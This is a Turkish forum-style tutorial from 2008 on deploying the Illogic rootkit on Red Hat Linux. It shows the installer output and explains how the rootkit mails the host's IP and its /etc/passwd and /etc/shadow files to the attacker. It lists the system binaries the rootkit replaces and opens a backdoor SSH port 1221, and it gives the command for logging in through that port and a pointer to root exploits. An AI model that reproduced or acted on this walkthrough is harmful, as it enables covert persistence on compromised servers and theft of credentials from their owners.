Yine Bir Dokumanla Karşınızdayım.
Gecen Anlattıgım Backdoor Açmayla Aynı Kapıya Cıkıyor.
Bu Dokumanımda RootKIT’ın Ne Maksatla Kullanıldıgını Açıklayacagım...
Illogic Rootkit Üzerinden İşleme Geçicem.
Gene Surume Uygun Kafamızda Exploit Olusturup Deniyeceğiz.
Başlayalım Dokumana :
İşleme Yukarıda Dediğim Gibi Illogic RootKIT’Le Başlıcam.
Exploit Linux Redhat Sistemlerde Çalışır.
Eğer işletim sistemi RedHat değilse rootkit kurulurken şu uyarıyı verip kurma işlemini sona erdirir.
./setup
RedHat Linux Rootkit v0.6 Recompiled By ANGELO’’ - You dont have the right to judge me!
*********************************************************************
*********************************************************************
*********************************************************************
******************** Illogic Rootkit v1.0 ***************************
******************* Recompiled by ANGELO`` **************************
*********************************************************************
*********************************************************************
**********************************************************************
****************** We are now preparing the server *******************
**********************************************************************
* Installing from /tmp/deneme/illogic - Will erase /tmp/deneme/illogic after install
**FATAL** Unsupported release of redhat ((Bluebird)) ... possibly too old
Herşey Yolunda Giderse.İşlem Şu Şekilde Biter :
Done! Mailing results ... Please wait ...
rico have been anounced
* Rootkit installation Completed in 2 Seconds.
* Password: clpa5w6z
*
* IP: xxx.xxx.xxx.xxx:SSH port:1221 Password:skas9as7s
www.siteadi.123Artık Herşey setup Dosyasında Belirtilen Maile Yollanmıstır :=)
Bunlar Arasında Rootkitin kurulduğu sistemin IP adresi,
/etc/passwd /etc/shadow dosyaları yer almaktadır.
Bilgiler /lib/security/.config/info2 isimli dosyada saklamaktadır.
illogic Rootkit kurulum anında sistemdeki bazı dosyaları rootkitin ana dosyalarının kurulduğu
/lib/security/.config/bin dizine içine kopyalar.
Kopyalanan sisteme ait dosyaları:
/bin/su
/bin/ping
/usr/bin/du
/usr/bin/passwd
/usr/bin/find
/bin/netstat
/usr/sbin/lsof
RootKIT’te Bulunan Cleaner sistemde 1221
numaralı portu acar.
Artık Herhangi Bir Sistemden RootKIT’ın Oldugu Sisteme Erişebiliriz.
Şimdi SSH İle 1221.Porttan Sisteme Sızabiliriz :
ssh -p 1221 -l root
www.siteadı.123Evet Artık Sisteme Baglandık.
Şimdi Surume Uygun Çeşitli Exploitler Kullanarak Root Olabiliriz.
Komutlardan Nerdeyse Her Dokumanımda Bahsetmiştim.
RootKIT, Root Olmayı Saglayan Exploit Adresi :
http://www.packetstormsecurity.org/UNIX/penetration/rootkits/Hadi Diğer Dokumanlarla Gorusmek Uzere.
Salı Haz. 10, 2008 1:34 am